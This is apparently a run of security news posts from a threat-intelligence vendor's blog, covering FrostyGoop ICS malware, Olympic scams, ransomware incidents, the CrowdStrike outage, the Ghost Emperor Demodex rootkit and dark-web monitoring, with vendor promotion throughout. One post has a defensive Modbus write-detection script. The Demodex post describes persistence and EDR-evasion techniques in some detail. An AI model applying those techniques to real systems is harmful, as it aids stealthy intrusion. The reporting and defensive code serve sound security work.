For CEOs, the stakes are high. A single compromised password can lead to devastating consequences, from financial losses to reputational damage. With 80% of individuals reusing passwords across multiple accounts, the risk of a breach extends far beyond a single compromised system. Quick response by CEOs can be an important factor in limiting damage, and that's where dark web monitoring comes in.

The Sale of Ransomware and Malware

The dark web is a hub for the sale of the ransomware used in threat campaigns. These attacks can be devastating for businesses: the 2017 WannaCry attack on the UK's NHS reportedly cost it £92 million and led to the cancellation of over 19,000 appointments, and in the same year the shipping giant A.P. Moller-Maersk suffered losses of between $200 million and $300 million from the NotPetya attack, which rendered applications, laptops and servers useless. Dark web monitoring can help counter the threat posed by the sale of such services on dark web forums.

The Sale of Business Data

If your business is hacked and its data stolen, that data may well end up for sale on the dark web, which makes a platform that provides dark web threat intelligence to corporate leaders critical. Hackers also sell access to breached company databases, exposing everything from financial information to employees' personal details. Last year, Kaspersky researchers observed almost 40,000 dark web posts about the sale of internal corporate information, a 16% increase compared to the previous year.

The Sale of Credit Card Details

It is estimated that over 23 million credit cards are offered for sale on the dark web, harvested from a variety of sources, including online stores' checkout processes. Marketplaces called Automated Vending Carts (AVCs) sell credit card details without the buyer and seller needing to interact.

Importance of Dark Web Monitoring for CEOs

Dark web monitoring offers a strategic advantage in the ongoing battle against cybercrime. Here are some benefits of dark web monitoring for business executives.
  • Detect breaches early: Identify compromised credentials before they're exploited.
  • Assess vulnerabilities: Gain insights into potential weak points in security protocols.
  • Enhance incident response: React swiftly to emerging threats with actionable intelligence.
  • Protect executive data: Organizations can place special focus on protecting executive data through dark web monitoring tools.
Implementing a robust dark web monitoring program allows CEOs to stay ahead of potential threats, protecting their company's assets and reputation. This is crucial given the rise of ransomware-as-a-service and malware-as-a-service packages on the dark web, which enable even non-technical criminals to launch sophisticated attacks.

Building a Security Strategy

While dark web monitoring is a powerful tool, it's just one piece of a comprehensive cybersecurity strategy. CEOs should consider:
  • Dark web monitoring: Reliable dark web monitoring solutions for CEOs, such as Cyble Vision or Cyble Darkweb Intelligence, can be integrated into broader security strategies to provide dark web threat intelligence to corporate leaders.
  • Employee education: Train staff to recognize and report potential security threats and to respond to claims of breach or compromise. Dedicated staff should feel encouraged to report strategic insights on dark web threats to executives.
  • Multi-factor authentication: Implement additional layers of security beyond passwords to protect against leaked credentials offered for sale on the Dark Web.
  • Regular security audits: Continuously assess and improve organizational defenses.
  • Leverage AI tools in security implementation: Incorporate AI-powered dark web monitoring solutions, such as Cyble’s award-winning cyber threat intelligence platform, to make use of rich automated feeds that keep a CEO's dark web monitoring strategy current.
By combining dark web monitoring with these broader security measures, CEOs can create a robust defense against evolving cyber threats. In an era where data is a precious commodity, dark web monitoring gives CEOs critical insights with which to safeguard their organizations, and the peace of mind that rapid insight and response can bring.

Russia-Linked FrostyGoop Malware Threatens Industrial Control Systems Worldwide

By: Alan J
23 July 2024 at 16:33

FrostyGoop Malware Industrial Control Systems

A Russia-linked malware dubbed 'FrostyGoop' is raising alarm in the cybersecurity world because of the severe risk it poses to critical infrastructure across multiple sectors globally. FrostyGoop, discovered by researchers in April 2024, was deployed in a devastating attack on a district energy company in Ukraine that disrupted heating services for hundreds of apartment buildings. FrostyGoop is the first ICS-specific malware known to use Modbus TCP communications to directly impact operational technology, which lets its operators disrupt both legacy and modern systems. Researchers are urging enhanced ICS network visibility and monitoring to counter the malware.

FrostyGoop's Capabilities

Researchers from Dragos noted that FrostyGoop is written in Golang and compiled for Windows, and that it can read from and write to ICS devices over the Modbus TCP protocol; such devices typically hold registers containing crucial input, output and configuration data. A real-world FrostyGoop incident was observed in Ukraine, where a cyberattack disrupted heating services to over 600 apartment buildings in Lviv during sub-zero temperatures. The Cyber Security Situation Center of Ukraine shared data with the researchers, reporting that the attackers had sent Modbus commands to ENCO controllers, causing system malfunctions that took nearly two days to remediate.

[Figure: Russia-linked FrostyGoop malware. Source: hub.dragos.com]

The malware reads and writes data, logging the output to a console or storing it in a JSON file. FrostyGoop also accepts a JSON-formatted configuration file containing the information used to execute Modbus commands on a target device. The researchers found a sample configuration file named task_test.json; FrostyGoop accepts separate command-line arguments and distinct configuration files to specify target IP addresses and Modbus commands. The IP address in the identified sample configuration file belonged to an ENCO control device. ENCO control devices are typically used "for process control in district heating, hot water, and ventilation systems" to monitor sensor parameters such as temperature, pressure and insulation. The other fields within the FrostyGoop configuration file are described in the following table:

[Table: FrostyGoop configuration file fields. Source: hub.dragos.com]

Modbus-ready devices are widely used across all industrial sectors and organizations worldwide, making this malware a significant threat to critical infrastructure.

FrostyGoop Implications and Recommendations

Given the widespread use of the Modbus protocol in industrial environments, the emergence of FrostyGoop raises concerns across all industrial sectors. The malware's ability to evade detection by antivirus vendors demands specialized OT security measures to protect against its spread. The researchers recommend implementing the following measures, based on the SANS 5 Critical Controls for World-Class OT Cybersecurity:
  • ICS INCIDENT RESPONSE: Incident response plans should incorporate specialized procedures for OT environments, such as quickly isolating affected devices, analyzing network traffic for unauthorized Modbus commands, and restoring normal system operation.
  • DEFENSIBLE ARCHITECTURE: A lack of adequate network segmentation and the presence of internet-exposed controllers leave systems vulnerable to threats like FrostyGoop. Industrial environments can implement industrial demilitarized zones (DMZs) and enforce strict access controls between the corporate IT network and the OT environment.
  • ICS NETWORK VISIBILITY & MONITORING: Persistent monitoring of network traffic, including communications over the Modbus protocol, is essential for detecting and responding to anomalies and suspicious behavior such as unauthorized access or unusual traffic on TCP port 502.
  • SECURE REMOTE ACCESS: Previous FrostyGoop deployments have exploited vulnerabilities in remote access points. Remote access can be secured through multi-factor authentication (MFA), logging and monitoring of remote connections, and virtual private networks (VPNs) to encrypt data in transit, along with regular audits that review remote-access rights and privileges on a need-to-use basis.
  • RISK-BASED VULNERABILITY MANAGEMENT: Active vulnerability management tailored to the risks associated with ICS components through regular assessments can help mitigate vulnerabilities with evidence of active exploitation.
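The parser and policy check below are an added example, not code from Dragos or from the FrostyGoop sample, showing the kind of Modbus/TCP inspection the visibility and monitoring recommendation calls for: it decodes the MBAP header and function code of each request seen on TCP port 502 and raises an alert for any state-changing (write) function issued by a host that is not on the engineering-workstation allowlist, and for frames that are not well-formed Modbus/TCP. The host addresses, the allowlist and the three captured frames are constructed for the example.

```python
import struct
from dataclasses import dataclass
from typing import Optional

# Modbus function codes that change device state. FrostyGoop's impact comes
# from writes like these; reads are the normal polling traffic from an HMI.
WRITE_FUNCTIONS = {
    0x05: "Write Single Coil",
    0x06: "Write Single Register",
    0x0F: "Write Multiple Coils",
    0x10: "Write Multiple Registers",
    0x16: "Mask Write Register",
    0x17: "Read/Write Multiple Registers",
}
READ_FUNCTIONS = {
    0x01: "Read Coils",
    0x02: "Read Discrete Inputs",
    0x03: "Read Holding Registers",
    0x04: "Read Input Registers",
}


@dataclass
class ModbusRequest:
    transaction_id: int
    unit_id: int
    function_code: int
    start_address: int
    data: bytes


def parse_modbus_tcp(payload: bytes) -> ModbusRequest:
    """Decode a Modbus/TCP request: 7-byte MBAP header followed by the PDU."""
    if len(payload) < 8:
        raise ValueError("frame too short for an MBAP header and function code")
    transaction_id, protocol_id, length, unit_id = struct.unpack(">HHHB", payload[:7])
    if protocol_id != 0:
        raise ValueError(f"protocol id {protocol_id} is not Modbus/TCP")
    # The MBAP length counts every byte after itself, unit id included.
    if length != len(payload) - 6:
        raise ValueError("MBAP length field does not match the frame size")
    function_code = payload[7]
    # Every read/write request above starts its data with a 16-bit address.
    start_address = struct.unpack(">H", payload[8:10])[0] if len(payload) >= 10 else -1
    return ModbusRequest(transaction_id, unit_id, function_code, start_address, payload[10:])


def inspect_request(src_ip: str, dst_ip: str, payload: bytes,
                    write_allowlist: set) -> Optional[str]:
    """Return an alert string, or None when the request is within policy."""
    try:
        req = parse_modbus_tcp(payload)
    except ValueError as err:
        return f"MALFORMED {src_ip}->{dst_ip}: {err}"
    if req.function_code in WRITE_FUNCTIONS and src_ip not in write_allowlist:
        return (f"UNAUTHORIZED WRITE {src_ip}->{dst_ip} unit {req.unit_id}: "
                f"{WRITE_FUNCTIONS[req.function_code]} at address {req.start_address}")
    if req.function_code not in WRITE_FUNCTIONS and req.function_code not in READ_FUNCTIONS:
        return f"UNUSUAL FUNCTION 0x{req.function_code:02x} {src_ip}->{dst_ip}"
    return None


def run_detection(flows, write_allowlist):
    """Apply the policy to (src, dst, payload) tuples and collect the alerts."""
    alerts = []
    for src_ip, dst_ip, payload in flows:
        alert = inspect_request(src_ip, dst_ip, payload, write_allowlist)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample traffic (not a real capture): an HMI polling and tuning a
# controller, then a rogue host sending Write Multiple Registers (0x10).
HMI = "10.10.1.5"
CONTROLLER = "10.10.1.20"
ROGUE = "10.10.1.99"
SAMPLE_FLOWS = [
    (HMI, CONTROLLER, bytes.fromhex("0001 0000 0006 01 03 0000 000a")),  # read 10 holding registers
    (HMI, CONTROLLER, bytes.fromhex("0002 0000 0006 01 06 0010 0001")),  # write single register
    (ROGUE, CONTROLLER, bytes.fromhex("0003 0000 000b 01 10 0010 0002 04 0000 0000")),
]
WRITE_ALLOWLIST = {HMI}  # only the engineering workstation/HMI may write

if __name__ == "__main__":
    for line in run_detection(SAMPLE_FLOWS, WRITE_ALLOWLIST):
        print(line)
```

In a real deployment the payloads would come from a span-port capture or a Modbus-aware sensor rather than an inline list, and the allowlist would be built from the asset inventory; the policy itself (who may write, and from where) is what turns raw port 502 visibility into a detection.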
The broad applicability of the FrostyGoop threat demands stronger defenses for critical infrastructure and industrial environments worldwide.

Researchers Observe Persistent Olympic Scams Ahead of Start

By: Alan J
22 July 2024 at 21:19

Paris Olympic Scams

As the world prepares for the start of the Paris Olympics later this week, athletes and spectators alike are filled with excitement and anticipation. Amid the thrill of competition, however, researchers have observed a range of Paris Olympic scams aimed at unsuspecting visitors and internet users seeking event tickets and merchandise. The researchers describe the tactics these scams use, how to identify them, and how to protect yourself.

The 48GB Mobile Data Scam

With an estimated 15.3 million visitors expected in Paris, scammers are capitalizing on the huge number of tourists in an unfamiliar environment, preying on their excitement to steal personal and banking data through fraudulent deals and services that are 'too good to be true'.

[Figure: Paris Olympic mobile data scam, 2024. Source: www.kaspersky.com]

Researchers from Kaspersky observed several kinds of scams, one of which involves fake mobile plans that promise visiting tourists 48GB of free internet. Victims who fall for it receive not a single free megabyte after registering and filling out the forms, which typically collect phone numbers, personal details and bank details that are then used to steal money from bank accounts. Tourists may notice the theft very late, since they are too preoccupied with watching the Olympic events to scrutinize their bank transactions. Since a 40GB mobile data plan in France costs around €11 ($12), such giveaways are highly implausible; victims lose both their money and their personal information.

Ticketing and Merchandise Scams

Scammers have also targeted Olympic ticket and merchandise sales. Fake ticketing websites offer a range of events, from archery to badminton, and even request personal data and consent to collect information.

[Figure: Paris Olympic scams. Source: www.kaspersky.com]

Several phishing websites were observed claiming to sell Olympic merchandise at great prices while actually attempting to steal money and personal information. To avoid falling victim, the researchers recommend sticking to the official Olympics website for ticket purchases and being wary of suspicious sites such as strangers[.]ope, which offers merchandise such as keychains, commemorative coins, magnets and scarves at significantly discounted prices.

[Figure: Paris Olympic scams, 2024. Source: www.kaspersky.com]

These sites often appear legitimate, with integrated pop-ups that request the visitor's consent to collect personal data and to use tracking cookies. They often link to their own "privacy policies," which lead the unsuspecting victim to unwittingly share sensitive data with the scammers.

Protecting Yourself from Olympic Scams

To stay safe during the Olympics and avoid ticketing, merchandise and giveaway scams, the researchers recommend the following tips:
  • Use a virtual card with a spending limit for online purchases
  • Turn on two-factor authentication wherever possible
  • Be cautious of 'too good to be true' offers and gifts from strangers
  • Stick to official sources for ticket purchases and merchandise
  • Use reputable antivirus software.
Security researchers expected a rise in scams as the Olympic events drew nearer; one Russian AI-powered disinformation campaign attempting to tarnish the image of the Games began almost a year before they started.

Ransomware Recovery Effort Cost Suffolk County $25.7 Million, Prompting Investigation

By: Alan J
22 July 2024 at 18:30

Suffolk County cyberattack ransomware attack

A Suffolk County ransomware attack has left a lasting impact on the community, with the county approving over $25 million in spending to recover from the devastating effects of the cyberattack. The attack, which took place on September 8, 2022, exposed the personal information of about 470,000 residents and 26,000 past and current employees of the Long Island, New York community, crippled police dispatch services for weeks, and shut down the county's main website for months.

Staggering Price of Recovery for Suffolk County

The $25.7 million figure, which includes multiyear contracts through the end of this year, dwarfs the $5.4 million officials frequently cited in the attack's immediate aftermath. This substantial sum doesn't even account for thousands of hours of employee overtime or additional non-technology expenses related to the incident, such as legal fees. County officials have defended the spending, citing the need to secure county documents and information, and to prevent future attacks. However, critics have raised concerns about the lack of transparency and oversight in the spending process. Suffolk County Comptroller John Kennedy, a Republican and longtime political rival of former County Executive Steve Bellone, has called for a review of the spending and accused the Bellone administration of spending $13.8 million on products that either were not needed or never deployed. Key expenditures in the Bellone administration's recovery efforts include:
  • $8.1 million to California-based security vendor Palo Alto Networks
  • $3.18 million for an "umbrella" support agreement through 2025
  • $1.67 million for forensic investigation and remediation efforts
The attack's impact was far-reaching, shutting down the county's main website for months and affecting payment systems, public records access, and online testing systems.

Controversy and Calls for Investigation

First-year Suffolk County Executive Edward P. Romaine has also called for a review of the spending and has asked for a select committee to investigate how the money was spent. "I wish I had that $26 million to spend on hardening the current county network," Romaine stated. The county is now working to improve its cybersecurity posture so that it can qualify for cyber insurance for the first time in its history. Romaine said that assessing the actual cost of the cyberattack may be difficult, because his administration's investigation was hampered by a lack of records maintained during the recovery effort; he alleged that some of these records were removed or destroyed before his administration took over. "When I heard they had spent $27 million between September of 2022 and December of 2023, I said, 'Well, what did you get for your money? Where is it?'" Romaine stated. "It’s hard to find because a lot of the records were erased." As Suffolk County continues to grapple with the fallout and costs of the ransomware attack, and with the subsequent controversy over spending, the incident is a stark reminder of the potentially astronomical costs and long-lasting impact of cybersecurity breaches on local governments.

CrowdStrike Addresses Critical Windows Update Issue, Tests New Opt-In Remediation Technique

By: Alan J
22 July 2024 at 16:03

CrowdStrike Update

CrowdStrike is actively working to resolve a defect in a content update that struck about 8.5 million Windows machines on July 19 and continues to disrupt many Windows hosts days later. In a recent update, the cybersecurity company said it has "tested an update to the remediation that was deployed on Friday, July 19, 2024 05:27 UTC. The update has accelerated our ability to remediate hosts. Customers are encouraged to follow the Tech Alerts for latest updates as they happen." The company has also "published a video outlining the steps required to self-remediate impacted remote Windows laptops. We will continue to provide updates here as information becomes available and new fixes are deployed." In the update, CrowdStrike explains that the incident is not a cyberattack and that the defect has been "identified and isolated, and a fix has been deployed." CrowdStrike had previously introduced a new technique aimed at speeding up remediation of impacted systems and is now operationalizing an opt-in option for this method; customers are encouraged to follow CrowdStrike's Tech Alerts for timely updates and will be notified when action is necessary. Microsoft has also released a fix for the faulty CrowdStrike update, which caused bugcheck and "blue screen of death" (BSOD) errors on millions of Windows hosts. Delta Airlines was one noteworthy company struggling to recover from the outage, and was still canceling about 20% of its flights as of early afternoon Eastern U.S. time on Monday, July 22. CrowdStrike shares (CRWD) have plunged more than 20% since the incident, erasing roughly $15 billion in market cap. CEO George Kurtz has assured customers that the faulty update was not the result of a cyberattack and that Falcon platform systems remain unaffected.

CrowdStrike Outage Response and Customer Support

The defective update stemmed from a Windows sensor-related content deployment, specifically a channel file in the CrowdStrike directory, and has sparked widespread discussion in the cybersecurity industry about how to make software updates and rollouts safer and more reliable. CrowdStrike CSO Shawn Henry took to LinkedIn to apologize for the incident:
"On Friday, though, we failed. The past two days have been the most challenging 48 hours for me over 12+ years. The confidence we built in drips over the years was lost in buckets within hours, and it was a gut punch. But this pales in comparison to the pain we've caused our customers and our partners. We let down the very people we committed to protect, and to say we’re devastated is a huge understatement. I, and the entire company, take that personally. Thousands of our team members have been working 24/7 to get our customer systems fully restored. The days have been long and the nights have been short, and that will continue for the immediate future. But that is part of the promise we made to all of you when you put your trust and protection in our hands."
The company quickly mobilized its resources to assist affected customers. A new technique to accelerate system remediation was tested in collaboration with clients, with an opt-in process being implemented. CrowdStrike is providing regular updates through its support portal and social media channels, urging customers to verify communication with official representatives. Kurtz emphasized the company's commitment to transparency and customer trust. "Nothing is more important to me than the trust and confidence that our customers and partners have put into CrowdStrike," he stated. The CEO promised full disclosure on the incident's cause and preventive measures for the future.

Technical Details and Remediation Steps

For systems still experiencing crashes, CrowdStrike recommends rebooting to download the reverted channel file, multiple times if necessary. If issues persist, manual or automated remediation options are available, including a bootable USB key for automated fixes. In response to the widespread issues caused by the faulty update of the CrowdStrike Falcon agent on Windows clients and servers, Microsoft released its own recovery tool for system administrators and IT staff. The updated Microsoft recovery tool offers two repair options, Recover from WinPE (Windows Preinstallation Environment) and Recover from Safe Mode, and includes guidance for recovering BitLocker encryption keys if necessary.

[Figure: CrowdStrike update on Windows outage recovery]

As the situation evolves, CrowdStrike continues to prioritize customer support and system restoration, even as the question of who will pay for the restoration effort remains unresolved. The company acknowledges the impact of the incident and says it is working tirelessly to regain customer confidence through transparent communication and effective problem-solving. Henry wrote in his post: "I know I speak for the women and men of CrowdStrike when I say thank you to every customer and partner who has also been working around the clock. You are the real heroes in all of this. We are committed to re-earning your trust by delivering the protection you need to disrupt the adversaries targeting you. Despite this setback, the mission endures."

Chinese-Linked Threat Actor ‘Ghost Emperor’ Returns With Demodex Rootkit

By: Alan J
19 July 2024 at 22:15

Chinese Threat Actor 'Ghost Emperor' Demodex Rootkit

A China-linked hacking group known as Ghost Emperor has resurfaced with an updated version of its sophisticated Demodex rootkit, according to cybersecurity researchers. Ghost Emperor typically targets Southeast Asian telecom and government entities, and has modified its infection chain and added new evasion techniques to its malware arsenal.

New Ghost Emperor Demodex Infection Chain

GhostEmperor employs a multi-stage malware chain to achieve stealthy execution and persistence, and uses several methods to impede analysis.

[Figure: Ghost Emperor Demodex infection chain. Source: sygnia.co]

Researchers from Sygnia found that the updated Demodex infection chain begins when the attackers use WMIExec, a remote execution tool, to run a batch file on the victim's machine. The batch file drops a CAB file named "1.cab" to C:\Windows\Web, extracts four files from it, and imports two malicious registry files with the reg.exe import [file] command. The threat actor relies on legitimate Microsoft tools such as reg.exe and expand.exe to keep its operations stealthy. After importing the registry keys, the batch file executes an encrypted PowerShell script that creates a new service named "WdiSystem" to load a malicious service DLL (prints1m.dll). The script also creates a service group called "WdiSystemhost" and runs the malicious service within this group, so that the malware process masquerades as a legitimate Windows system process. The service DLL dynamically resolves the functions it needs through an internal OS structure, the Process Environment Block, reaches the LoadLibraryA function, and deciphers an encrypted configuration containing parameters such as the initial sleep time, the registry paths where the shellcode is stored, and a list of the module and function names required for operation. The security firm's incident response team uncovered the new variant while investigating a network breach that affected both a client and its business partner. The malware, compiled in July 2021, resembles a version analyzed by Kaspersky in 2021 but incorporates several key changes.

Enhanced Evasion Techniques

The malware applies an EDR evasion technique by setting a process mitigation policy on its processes that forbids loading DLLs not signed by Microsoft, which limits user-mode hooking and helps circumvent analysis tools. The service also reads two encrypted registry keys, decrypts the shellcode, and sets up a reflective loader to execute the core-implant DLL. The researchers note that Ghost Emperor has implemented the following new methods to evade detection:
  • EDR Evasion: The malware sets a process mitigation policy that prevents loading of non-Microsoft signed DLLs, potentially blocking security software from injecting monitoring code.
  • Dynamic Function Loading: The malicious DLL dynamically loads necessary functions, making static analysis more difficult.
  • Encrypted Configuration: Key parameters, including registry paths and required function names, are stored in an encrypted configuration within the DLL.
  • Reflective Loading: A position-independent shellcode acts as a reflective loader for the core implant, which is stored as a corrupted PE file to resist analysis.
The researchers have shared a list of IOCs (Indicators of Compromise) in their report.

[Figure: Ghost Emperor Demodex infection chain. Source: sygnia.co]

The Ghost Emperor threat actor group is the latest of several China-linked APTs demonstrating advanced techniques and evolved capabilities, raising concern among governments, independent researchers and security firms about threats from the region.

Two LockBit Ransomware Affiliates Plead Guilty in U.S. Federal Court

By: Alan J
19 July 2024 at 19:28

LockBit Ransomware Affiliates Plead Guilty Ruslan Magomedovich Astamirov Mikhail Vasiliev

Two foreign nationals from the notorious international ransomware group LockBit have pleaded guilty in Newark federal court to participating in the group and deploying attacks against victims in the United States and worldwide. Ruslan Magomedovich Astamirov, 21, a Russian national, and Mikhail Vasiliev, 34, a dual Canadian-Russian citizen, admitted their involvement. Between 2020 and 2024, the LockBit group attacked over 2,500 victims in at least 120 countries, 1,800 of them in the United States, extorting hundreds of millions of dollars in ransom payments.

Scope of LockBit's Operations

The guilty pleas follow the disruption of LockBit in February, in which the UK National Crime Agency's Cyber Division, working with the Justice Department, the FBI and other international law enforcement partners, seized public-facing websites and took control of servers used by LockBit administrators, disrupting the group's ability to attack and encrypt networks. The disruption damaged LockBit's reputation and its ability to attack further victims. The case also involves charges against other LockBit members, including its alleged creator, developer and administrator, Dmitry Yuryevich Khoroshev, who is currently the subject of a reward of up to $10 million through the U.S. Department of State's Transnational Organized Crime Rewards Program. Khoroshev is accused of recruiting new affiliates, acting as the group's representative, and developing and maintaining the infrastructure affiliates use to deploy LockBit attacks. U.S. Attorney Philip R. Sellinger emphasized the commitment to holding cybercriminals accountable, stating:
β€œAstamirov and Vasiliev thought that they could deploy LockBit from the shadows, wreaking havoc and pocketing massive ransom payments from their victims, without consequence. They were wrong. We, in New Jersey, along with our domestic and international law enforcement partners will do everything in our power to hold LockBit’s members and other cybercriminals accountable, disrupt and dismantle their operations, and put a spotlight on them as wanted criminals – no matter where they hide."

Impact of the Guilty LockBit Pleas

Astamirov, who operated under aliases such as "BETTERPAY" and "Eastfarmer," deployed LockBit against at least 12 victims between 2020 and 2023, extorting approximately $1.9 million in ransom payments. He agreed to forfeit $350,000 in seized cryptocurrency as part of his plea agreement. Vasiliev, known online as "Ghostrider" and "Free," among other aliases, targeted at least 12 victims between 2021 and 2023, causing at least $500,000 in damages and losses.

LockBit Victim Assistance

LockBit victims are encouraged to contact the FBI and submit information at https://lockbitvictims.ic3.gov. Law enforcement has developed decryption capabilities that may enable hundreds of victims around the world to restore systems encrypted using the LockBit ransomware variant. Victims are also encouraged to visit https://www.justice.gov/usao-nj/lockbit for case updates and information regarding their rights under U.S. law, including the right to submit victim impact statements and request restitution.

Securing Healthcare Data: Dark Web Monitoring Insights for CISOs

By: Alan J
19 July 2024 at 16:48

Securing Healthcare Data- Dark Web Monitoring Insights for CISOs

In today's digital age, healthcare data has become a prime target for cybercriminals. With a single health record fetching up to $1,000 on the dark web, Chief Information Security Officers (CISOs) in the healthcare sector face unprecedented challenges. The comprehensive nature of healthcare data makes it a high-value commodity on the dark web, attracting cybercriminals who exploit outdated IT systems and ransomware vulnerabilities. With the help of Cyble's threat intelligence researchers, we offer dark web monitoring insights for CISOs, examining the dark web's appetite for healthcare data, the risks presented by healthcare data breaches, and the essential steps CISOs must take to secure sensitive information.

Dark Web's Allure for Healthcare Data

The dark web, the part of the web that is excluded from search engines and can often only be accessed through specialized browsers like Tor, has become a hub for cybercriminal activity. Its anonymity provides a safe haven for illegal activities and an ideal setting for the sale of stolen healthcare data. A single health record can fetch as much as $1,000, exceeding the value of credit card or Social Security numbers. In an article on its website, the American Hospital Association Center for Health Innovation cites data from an IBM Security study, stating:
In fact, stolen health records may sell up to 10 times or more than stolen credit card numbers on the dark web. Unfortunately, the bad news does not stop there for health care organizations — the cost to remediate a breach in health care is almost three times that of other industries — averaging $408 per stolen health care record versus $148 per stolen non-health record.
[Figure: Post on BreachForums alleging breach of HealthCare.gov]

According to Cyble Research and Intelligence Labs (CRIL), outdated IT infrastructure and operating systems in many healthcare organizations leave them vulnerable to cyberattacks, and the COVID-19 pandemic further exacerbated these risks by necessitating remote work and creating new security gaps. Cybercriminals have developed a sophisticated multi-tiered business model for stolen healthcare data, making it difficult for law enforcement to trace the source. Illegally obtained data is commoditized and sold, with the price varying according to its potential value to the buyer. This data is often combined with other information to create complete patient profiles, which are then sold for various fraudulent activities. The comprehensive nature of healthcare records and their richness in personal information make them a goldmine for identity theft and insurance fraud, and a threat that healthcare CISOs need to stay on top of.

Ransomware Disruptions to Healthcare

Ransomware attacks have become a profitable venture for cybercriminals, with healthcare organizations being prime targets due to the critical nature of their services and the high value of patient data. These disruptions can lead to compromised patient care, increased mortality rates, and severe financial and operational consequences.

[Image] Source: Cyble Threat Landscape Report 2024 (Emerging Threats to the U.S. Healthcare Sector in 2024)

According to data from the Director of National Intelligence, ransomware attacks on healthcare providers have surged, with an increase of up to 128 percent in the U.S. alone: 258 victims in 2023 compared to 113 victims in 2022. The study found that LockBit and ALPHV/BlackCat were the two most "popular RaaS providers" and were responsible for more than 30 percent of all reported healthcare attacks worldwide.

[Image] Source: dni.gov

These attacks not only disrupt services but also lead to longer patient stays, delays in medical procedures and, in some cases, higher mortality rates, substantial financial costs, potential HIPAA violations and even reputational damage to the healthcare institution. And the data stolen in these attacks often winds up for sale on the dark web. The DNI's study stated, "US hospitals have delayed medical procedures, disrupted patient care because of multi-week outages, diverted patients to other facilities, rescheduled medical appointments, and strained acute care provisioning and capacity as a result of ransomware attacks."

[Image] Source: Cyble Threat Landscape Report (Emerging Threats to the U.S. Healthcare Sector in 2024)

Cybercriminals employ various tactics in healthcare ransomware attacks, including:
  • Phishing emails with malicious links
  • Complex attacks designed to maximize damage
  • Encrypting personal health information (PHI)
  • Exploiting vulnerabilities in medical devices

Protecting the Healthcare Sector

As healthcare data becomes increasingly valuable on the dark web, CISOs must remain vigilant and proactive. By implementing robust security measures, educating staff, and empowering patients, healthcare organizations can better protect sensitive information from cyber threats.
  • Educating healthcare staff on data handling: The persistent targeting of the healthcare industry highlights the vital need for cybersecurity training. Staff must be educated on identifying phishing attempts, using secure authentication practices such as MFA, complying with HIPAA and other laws, and adhering to mobile and other device security policies. A visible and accessible healthcare security team, supported by proactive leadership, can foster a culture where security is everyone's responsibility.
  • Patient involvement in protecting healthcare data: Patients also have a role to play in the protection of healthcare data - they should actively review health records, use secure healthcare channels, and report any suspicious activity to healthcare providers.
  • Monitoring the dark web: Tools such as Cyble's dark web monitoring solution offer early breach detection and AI-powered threat tagging, enabling CISOs to identify threats and breaches earlier and to address and contain problems faster.
  • Comprehensive logging of healthcare systems: Comprehensive logging of healthcare systems helps CISOs and security staff track and analyze potential security incidents.
  • Strong access controls: Implementing strong access controls for critical healthcare systems, including role-based access control (RBAC), multi-factor authentication and the principle of least privilege, can help prevent attackers from reaching sensitive data. Regularly reviewing and updating access controls helps ensure compliance with changing security requirements.
  • Data encryption: Encrypting sensitive healthcare data in transit and at rest using industry-standard protocols and algorithms (e.g., SSL/TLS, AES) helps protect that data from unauthorized access.
  • Secure mobile devices: A mobile device security policy should be developed and enforced, covering best practices for device configuration, password management, and data encryption for mobile devices used within the healthcare environment.
  • Network segmentation: Implementing network segmentation can isolate critical healthcare systems and reduce the attack surface.
  • Keep software, firmware, and applications updated: Establishing a regular update schedule for software, firmware, and applications used in healthcare systems helps keep threat actors out. Implement automated update mechanisms where possible to minimize downtime and ensure timely patching of vulnerabilities.

Monitoring the Dark Web for Healthcare Data

Healthcare CISOs can do a lot to protect patient data and keep it off the dark web by isolating and securing critical systems and encrypting data. But in the event that some data does leak out, dark web monitoring solutions are your best bet for an early warning.

Pueblo County School District 70 Confirms Data Breach; CIA Involved in Investigation

By: Alan J
18 July 2024 at 19:39


Pueblo County School District 70 is taking steps to address a recent data breach and ransomware attack that may have compromised the personal information of former students of the Colorado school district, as well as current and former staff. The data compromised in the Pueblo County School District 70 data breach is believed to stem from between 1991 and 2006, and is said to include student and staff records from an undetermined period. Superintendent Ronda Rein acknowledged the delay in public disclosure of the data breach incident, and confirmed the involvement of federal agencies in its investigation.

Pueblo County School District 70 Data Breach Response

According to one report, the district was notified of the ransomware attack by Sophos on April 27, and a data breach was confirmed by the CIA on May 15. IT technicians and agents from various organizations, including Pueblo School District 60, Colorado State University Pueblo, the CIA, and the FBI, assisted in identifying the affected data. According to Superintendent Ronda Rein, the district was not allowed to release information immediately due to the involvement of the CIA in the investigation. It is not clear why the CIA was involved in the matter.

[Image] Pueblo County School District 70 Data Breach Notice (Source: district70.org)

Rein emphasized that the district has taken measures to strengthen its systems and protect personal information. These measures include implementing two-step authentication on staff accounts, moving critical information from local servers to cloud-based servers, and hiring a full-time staff member responsible for cybersecurity. The district has also limited access to district resources to U.S.-based requests and narrowed its firewall and VPN access to admin staff only.

Advice for Affected Individuals

In its data breach notice, Pueblo County School District 70 advised students, staff, alumni, and community members to monitor credit reports and financial statements, consider restricting access to their credit report, consider a fraud alert, and protect themselves from suspicious communications. Those seeking additional assistance can contact the district's IT support team at 719-549-6121. By taking active measures to strengthen its systems and inform affected individuals, Pueblo County School District 70 hopes to support its community during potential fallout from the data breach incident. Superintendent Rein stated, "We take the privacy and security of our community's information extremely seriously." She added, "We are working diligently with cybersecurity experts to fully understand the scope of this incident and to strengthen our systems against future threats." The incident notice promoted the use of identity theft protection resources available through Equifax, Experian, LifeLock, and TransUnion, stating that contact information for those agencies was available on the school district's website. "We apologize for any concern or inconvenience this may cause and are committed to supporting our community through this process," the data breach notice read.

Researchers Discover Intrusive 'HotPage' Malware with Microsoft-Signed Driver

By: Alan J
18 July 2024 at 19:26


Researchers have observed a seemingly innocuous software installer named HotPage.exe being used to deploy a Microsoft-signed driver with the capability of injecting code into remote system processes and intercepting browser traffic. While the malware had been initially detected as adware, its malware-like ability to modify web content and redirect users raised red flags among security researchers. The driver, signed by Microsoft, was developed by an obscure Chinese company called Hubei Dunwang Network Technology Co., Ltd.

Intrusive Nature of HotPage

